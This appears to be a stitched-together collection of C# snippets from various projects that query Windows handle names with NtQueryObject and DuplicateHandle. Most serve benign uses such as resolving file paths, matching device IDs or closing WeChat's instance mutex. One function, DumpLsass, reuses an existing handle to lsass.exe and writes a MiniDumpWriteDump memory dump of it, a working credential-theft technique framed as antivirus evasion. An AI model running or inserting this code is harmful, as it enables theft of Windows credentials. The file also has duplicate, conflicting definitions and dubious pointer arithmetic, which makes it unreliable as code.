/// <summary>
/// Retrieves the name of the object referenced by the specified handle using NtQueryObject.
/// </summary>
private static string GetHandleObjectName(IntPtr handle, uint pid)
{
IntPtr duplicatedHandle;
if (!DuplicateHandle(handle, pid, out duplicatedHandle))
{
return(null);
}
int length = Marshal.SizeOf(typeof(OBJECT_NAME_INFORMATION)) + 256, dummy;
IntPtr buffer = Marshal.AllocHGlobal(length);
try
{
NtStatus status = NtQueryObject(duplicatedHandle,
OBJECT_INFORMATION_CLASS.ObjectNameInformation, buffer, length, out dummy);
if (status == NtStatus.Success)
{
OBJECT_NAME_INFORMATION info = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(buffer, typeof(OBJECT_NAME_INFORMATION));
return(info.Name.ToString());
}
}
finally
{
Marshal.FreeHGlobal(buffer);
CloseHandle(duplicatedHandle);
}
return(null);
}
public static void FindAndCloseWeChatMutexHandle(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
try
{
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
// 通过 DuplicateHandle 访问句柄
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return;
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
// 查询句柄名称
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return;
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
OBJECT_NAME_INFORMATION objObjectName = new OBJECT_NAME_INFORMATION();
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(hObjectName, objObjectName.GetType());
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
Console.WriteLine(strObjectName);
// \Sessions\1\BaseNamedObjects\_WeChat_App_Instance_Identity_Mutex_Name
if (strObjectName.Contains("_Instance_Identity_Mutex_Name"))
{
// 通过 DuplicateHandle DUPLICATE_CLOSE_SOURCE 关闭句柄
IntPtr mHandle = IntPtr.Zero;
if (DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out mHandle, 0, false, DUPLICATE_CLOSE_SOURCE))
{
CloseHandle(mHandle);
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
}
public static void DumpLsass(SYSTEM_HANDLE_INFORMATION handleInfo, string FileName)
{
// Code for getting handles was found here https://stackoverflow.com/questions/54872228/c-sharp-how-to-find-all-handles-associated-with-current-process
// idea for getting existing handles to dump lsass found here https://skelsec.medium.com/duping-av-with-handles-537ef985eb03
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, (int)handleInfo.ProcessID);
bool test = DuplicateHandle(openProcessHandle, new IntPtr(handleInfo.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS);
int pLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectTypeInformation, hObjectName, pLength, ref pLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (pLength == 0)
{
Console.WriteLine("Length returned at zero!");
}
hObjectName = Marshal.AllocHGlobal(pLength);
}
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
if (strObjectName == "Process")
{
int max = 1024;
StringBuilder str = new StringBuilder(max);
QueryFullProcessImageName(ipHandle, 0, str, ref max);
if (str.ToString().Contains("lsass.exe"))
{
Console.WriteLine("[+] Found open handle to lass: " + ipHandle);
FileStream dumpFile = new FileStream(FileName, FileMode.Create);
Console.WriteLine("[+] Attempting to dump lsass with handle...");
bool dumped = MiniDumpWriteDump(ipHandle, handleInfo.ProcessID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
dumpFile.Close();
if (dumped == true)
{
Console.WriteLine("[+] Dumped lsass");
System.Environment.Exit(1);
}
}
}
}
}
public static void NtQueryObject(IntPtr Handle, out OBJECT_NAME_INFORMATION ObjectNameInformation)
{
IntPtr buffer = Marshal.AllocHGlobal(1024);
try{
Ntdll.NtQueryObject(Handle, 1, buffer, 1024);
ObjectNameInformation = Marshal.PtrToStructure <Ntdll.OBJECT_NAME_INFORMATION>(buffer);
}finally{
Marshal.FreeHGlobal(buffer);
}
}
public OBJECT_NAME_INFORMATION GetHandleNameInfo(int pid, UInt16 handle, OBJECT_BASIC_INFORMATION obi)
{
// 枚举进程句柄 - xbgprogrammer的专栏 - 博客频道 - CSDN.NET
// http://blog.csdn.net/xbgprogrammer/article/details/26386733
// HOWTO: Enumerate handles - Sysinternals Forums
// http://forum.sysinternals.com/howto-enumerate-handles_topic18892.html
if (MAGIC_FLAG == (MAGIC_FLAG & obi.GrantedAccess))
{
return(default(OBJECT_NAME_INFORMATION));
}
IntPtr src_proc_handle = OpenProcess(PROCESS_DUP_HANDLE, 0, pid);
if (IntPtr.Zero == src_proc_handle)
{
return(default(OBJECT_NAME_INFORMATION));
}
IntPtr target_handle = IntPtr.Zero;
if (STATUS_SUCCESS != NtDuplicateObject(
src_proc_handle, (IntPtr)handle,
GetCurrentProcess(), ref target_handle,
0, 0, DUPLICATE_SAME_ACCESS))
{
CloseHandle(src_proc_handle);
return(default(OBJECT_NAME_INFORMATION));
}
int ret_obj_len = 0;
int obj_len = obi.NameInformationLength + 2; // sizeof(EOF) = sizeof('\0\0') = 2
byte[] bytes_obj_info = new byte[obj_len];
uint ret = NtQueryObject(target_handle, ObjectNameInformation, bytes_obj_info, obj_len, ref ret_obj_len);
if (STATUS_SUCCESS != ret)
{
CloseHandle(target_handle);
CloseHandle(src_proc_handle);
return(default(OBJECT_NAME_INFORMATION));
}
GCHandle gch = GCHandle.Alloc(bytes_obj_info, GCHandleType.Pinned);
OBJECT_NAME_INFORMATION oni = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(gch.AddrOfPinnedObject(), typeof(OBJECT_NAME_INFORMATION));
gch.Free();
CloseHandle(target_handle);
CloseHandle(src_proc_handle);
return(oni);
}
private static bool GetFileNameFromHandle(IntPtr handle, out string fileName)
{
IntPtr ptr = IntPtr.Zero;
RuntimeHelpers.PrepareConstrainedRegions();
try
{
int length = 0x200; // 512 bytes
RuntimeHelpers.PrepareConstrainedRegions();
try { }
finally
{
// CER guarantees the assignment of the allocated
// memory address to ptr, if an ansynchronous exception
// occurs.
ptr = Marshal.AllocHGlobal(length);
}
NT_STATUS ret = NativeMethods.NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length);
if (ret == NT_STATUS.STATUS_BUFFER_OVERFLOW)
{
RuntimeHelpers.PrepareConstrainedRegions();
try { }
finally
{
// CER guarantees that the previous allocation is freed,
// and that the newly allocated memory address is
// assigned to ptr if an asynchronous exception occurs.
Marshal.FreeHGlobal(ptr);
ptr = Marshal.AllocHGlobal(length);
}
ret = NativeMethods.NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length);
}
if (ret == NT_STATUS.STATUS_SUCCESS)
{
OBJECT_NAME_INFORMATION objNameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ptr, typeof(OBJECT_NAME_INFORMATION));
fileName = objNameInfo.Name.Buffer;
return(fileName.Length != 0);
}
}
finally
{
// CER guarantees that the allocated memory is freed,
// if an asynchronous exception occurs.
Marshal.FreeHGlobal(ptr);
}
fileName = string.Empty;
return(false);
}
private static string GetFilePath(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
try
{
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
if (GetFileType(ipHandle) != FileType.FileTypeDisk)
{
return(null);
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return(null);
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
return(GetRegularFileNameFromDevice(strObjectName));
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
return(null);
}
private static void GetObjectNameFromHandleFunc(object obj)
{
FileNameFromHandleState state = obj as FileNameFromHandleState;
int guessSize = 1024;
NT_STATUS ret;
IntPtr ptr = Marshal.AllocHGlobal(guessSize);
try
{
while (true)
{
ret = NativeMethods.NtQueryObject(state.Handle,
OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, guessSize, out int requiredSize);
if (ret == NT_STATUS.STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ptr);
guessSize = requiredSize;
ptr = Marshal.AllocHGlobal(guessSize);
continue;
}
if (ret == NT_STATUS.STATUS_SUCCESS)
{
OBJECT_NAME_INFORMATION oti = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ptr, typeof(OBJECT_NAME_INFORMATION));
state.FileName = oti.Name.GetText();
return;
}
break;
}
}
finally
{
if (ptr != IntPtr.Zero)
{
Marshal.FreeHGlobal(ptr);
}
state.Set();
}
}
private static Device GetHandleName(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process, int count, int handleCount)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
Device IDFound = null;
Int32 accessMask = (Int32)systemHandleInformation.AccessMask;
if (systemHandleInformation.ProcessID != process.Id ||
accessMask == 0x0012019f ||
accessMask == 0x001a019f ||
accessMask == 0x00120189 ||
accessMask == 0x00100000)
{
return(IDFound);
}
try
{
//Set up flags for and then get a process handle for the current process being checked
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
//Duplicate the process handle into ipHandle, if this fails return null
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(IDFound);
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024); //Allocate memory for a max length handle name
//Try to find out exactly how long the object name is, then once you've allocated the proper amount of memory, copy it into hObjectName
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return(IDFound);
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
//Move the infromation in hObjectName to an easier to use structure OBJECT_NAME_INFORMATION
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
//Check if we have a proper name
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
//Convert objObjectName to a normal string, this is the handle's name
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
bool deviceIDFound = false;
//Check the handle name for if it contains anything releveant (in this case it's checking for a device ID) if it does, return it
foreach (Device device in deviceList)
{
if (strObjectName.ToLower().Contains(device.PNPDeviceIDSubstring.ToLower()))
{
IDFound = device;
deviceIDFound = true;
}
}
if (deviceIDFound)
{
//Console.WriteLine("Handle matched!!!\n\n\nProcess Name: " + process.ProcessName + "strObjectName: " + strObjectName + "\nid: " + IDFound + "\n\n\n");
}
else
{
//If it doesnt, return null
//Console.WriteLine("(" + count + " / " + handleCount + "): " + strObjectName);
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
//Clean up managed memory
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
return(IDFound);
}
public static string GetObjectName(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle)
{
IntPtr _processHandle = NativeMethods.OpenProcess(ProcessAccessFlags.All, false, handle.UniqueProcessId);
IntPtr _handle = IntPtr.Zero;
try
{
if (!NativeMethods.DuplicateHandle(_processHandle, handle.HandleValue, NativeMethods.GetCurrentProcess(), out _handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS))
{
return(null);
}
IntPtr _basic = IntPtr.Zero;
int nameLength = 0;
try
{
OBJECT_BASIC_INFORMATION basicInfo = new OBJECT_BASIC_INFORMATION();
_basic = Marshal.AllocHGlobal(Marshal.SizeOf(basicInfo));
NativeMethods.NtQueryObject(_handle, (int)ObjectInformationClass.ObjectBasicInformation, _basic, Marshal.SizeOf(basicInfo), ref nameLength);
basicInfo = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(_basic, basicInfo.GetType());
nameLength = basicInfo.NameInformationLength;
}
finally
{
if (_basic != IntPtr.Zero)
{
Marshal.FreeHGlobal(_basic);
}
}
if (nameLength == 0)
{
return(null);
}
OBJECT_NAME_INFORMATION nameInfo = new OBJECT_NAME_INFORMATION();
IntPtr _objectName = Marshal.AllocHGlobal(nameLength);
try
{
while (NativeMethods.NtQueryObject(_handle, (int)ObjectInformationClass.ObjectNameInformation, _objectName, nameLength, ref nameLength) == NtStatus.InfoLengthMismatch)
{
Marshal.FreeHGlobal(_objectName);
_objectName = Marshal.AllocHGlobal(nameLength);
}
nameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(_objectName, nameInfo.GetType());
}
finally
{
Marshal.FreeHGlobal(_objectName);
}
try
{
return(Marshal.PtrToStringUni(nameInfo.Name.Buffer, nameInfo.Name.Length >> 1));
}
catch (Exception e)
{
Util.Logging.Log(e);
}
return(null);
}
finally
{
if (_handle != IntPtr.Zero) //moved from Marshal.FreeHGlobal(_objectName);
{
NativeMethods.CloseHandle(_handle);
}
if (_processHandle != IntPtr.Zero)
{
NativeMethods.CloseHandle(_processHandle);
}
}
}
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id);
IntPtr ipHandle = IntPtr.Zero;
var objBasic = new OBJECT_BASIC_INFORMATION();
IntPtr ipBasic = IntPtr.Zero;
var objObjectName = new OBJECT_NAME_INFORMATION();
IntPtr ipObjectName = IntPtr.Zero;
string strObjectName = "";
int nLength = 0;
int nReturn = 0;
IntPtr ipTemp = IntPtr.Zero;
if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(),
out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(nReturn = NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
if (Is64Bits())
{
ipTemp = ipObjectName + 16;
}
else
{
ipTemp = objObjectName.Name.Buffer;
}
if (ipTemp != IntPtr.Zero)
{
var baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
strObjectName = Marshal.PtrToStringUni(ipTemp);
//strObjectName = Encoding.Unicode.GetString (baTemp2);
return(strObjectName);
}
catch (AccessViolationException)
{
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
CloseHandle(ipHandle);
}
}
return(null);
}
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
var m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id);
var objBasic = new OBJECT_BASIC_INFORMATION();
var objObjectName = new OBJECT_NAME_INFORMATION();
int nLength = 0;
if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(),
out IntPtr ipHandle, 0, false, 0x2))
{
return(null);
}
var ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
IntPtr ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(_ = NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== 0xC0000004)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
IntPtr ipTemp;
if (Is64Bits())
{
ipTemp = new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32);
}
else
{
ipTemp = objObjectName.Name.Buffer;
}
if (ipTemp != IntPtr.Zero)
{
byte[] baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
string strObjectName = Marshal.PtrToStringUni(Is64Bits() ?
new IntPtr(ipTemp.ToInt64()) :
new IntPtr(ipTemp.ToInt32()));
return(strObjectName);
}
catch (AccessViolationException)
{
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
CloseHandle(ipHandle);
}
}
return(null);
}
private static bool GetFileNameOfLocalHandle(IntPtr handle, out string fileName)
{
if (handle.ToInt32() == 0)
{
throw new Exception("Handle is null");
}
IntPtr ptr = IntPtr.Zero;
RuntimeHelpers.PrepareConstrainedRegions();
try
{
int length = 0x200; // 512 bytes
RuntimeHelpers.PrepareConstrainedRegions();
try { }
finally
{
// CER guarantees the assignment of the allocated
// memory address to ptr, if an ansynchronous exception
// occurs.
ptr = Marshal.AllocHGlobal(length);
}
NT_STATUS ret = NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length);
if (ret == NT_STATUS.STATUS_BUFFER_OVERFLOW)
{
RuntimeHelpers.PrepareConstrainedRegions();
try { }
finally
{
// CER guarantees that the previous allocation is freed,
// and that the newly allocated memory address is
// assigned to ptr if an asynchronous exception occurs.
Marshal.FreeHGlobal(ptr);
ptr = Marshal.AllocHGlobal(length);
}
ret = NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, ptr, length, out length);
}
if (ret == NT_STATUS.STATUS_SUCCESS)
{
// fileName = Marshal.PtrToStringUni((IntPtr)((int)ptr + 16), (length - 9) / 2);
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(ptr);
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
fileName = GetRegularFileNameFromDevice(strObjectName);
//return strObjectName;
}
else
{
fileName = string.Empty;
}
return(fileName.Length != 0);
}
}
finally
{
// CER guarantees that the allocated memory is freed,
// if an asynchronous exception occurs.
Marshal.FreeHGlobal(ptr);
}
fileName = string.Empty;
return(false);
}
private static string GetObjectName(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle)
{
IntPtr _processHandle = OpenProcess(ProcessAccessFlags.All, false, handle.UniqueProcessId);
IntPtr _handle = IntPtr.Zero;
try
{
if (!DuplicateHandle(_processHandle, handle.HandleValue, GetCurrentProcess(), out _handle, 0, false, DUPLICATE_SAME_ACCESS))
return null;
IntPtr _basic = IntPtr.Zero;
int nameLength = 0;
try
{
OBJECT_BASIC_INFORMATION basicInfo = new OBJECT_BASIC_INFORMATION();
_basic = Marshal.AllocHGlobal(Marshal.SizeOf(basicInfo));
NtQueryObject(_handle, (int)ObjectInformationClass.ObjectBasicInformation, _basic, Marshal.SizeOf(basicInfo), ref nameLength);
basicInfo = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(_basic, basicInfo.GetType());
nameLength = basicInfo.NameInformationLength;
}
finally
{
if (_basic != IntPtr.Zero)
Marshal.FreeHGlobal(_basic);
}
if (nameLength == 0)
{
return null;
}
OBJECT_NAME_INFORMATION nameInfo = new OBJECT_NAME_INFORMATION();
IntPtr _objectName = Marshal.AllocHGlobal(nameLength);
try
{
while ((uint)(NtQueryObject(_handle, (int)ObjectInformationClass.ObjectNameInformation, _objectName, nameLength, ref nameLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(_objectName);
_objectName = Marshal.AllocHGlobal(nameLength);
}
nameInfo = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(_objectName, nameInfo.GetType());
}
finally
{
Marshal.FreeHGlobal(_objectName);
CloseHandle(_handle);
}
try
{
return Marshal.PtrToStringUni(nameInfo.Name.Buffer, nameInfo.Name.Length >> 1);
}
catch
{
}
return null;
}
finally
{
if (_processHandle != IntPtr.Zero)
CloseHandle(_processHandle);
}
}
public static string getObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id);
var ipHandle = IntPtr.Zero;
var objBasic = new OBJECT_BASIC_INFORMATION();
var ipBasic = IntPtr.Zero;
var ipObjectType = IntPtr.Zero;
var objObjectName = new OBJECT_NAME_INFORMATION();
var ipObjectName = IntPtr.Zero;
var nLength = 0;
var nReturn = 0;
var ipTemp = IntPtr.Zero;
if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, Native.GetCurrentProcess(),
out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(nReturn = Native.NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32) : objObjectName.Name.Buffer;
if (ipTemp != IntPtr.Zero)
{
var baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
var strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32()));
return(strObjectName);
}
catch (AccessViolationException)
{
Console.WriteLine("[WARNING] Access violation!");
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
Native.CloseHandle(ipHandle);
}
}
return(null);
}
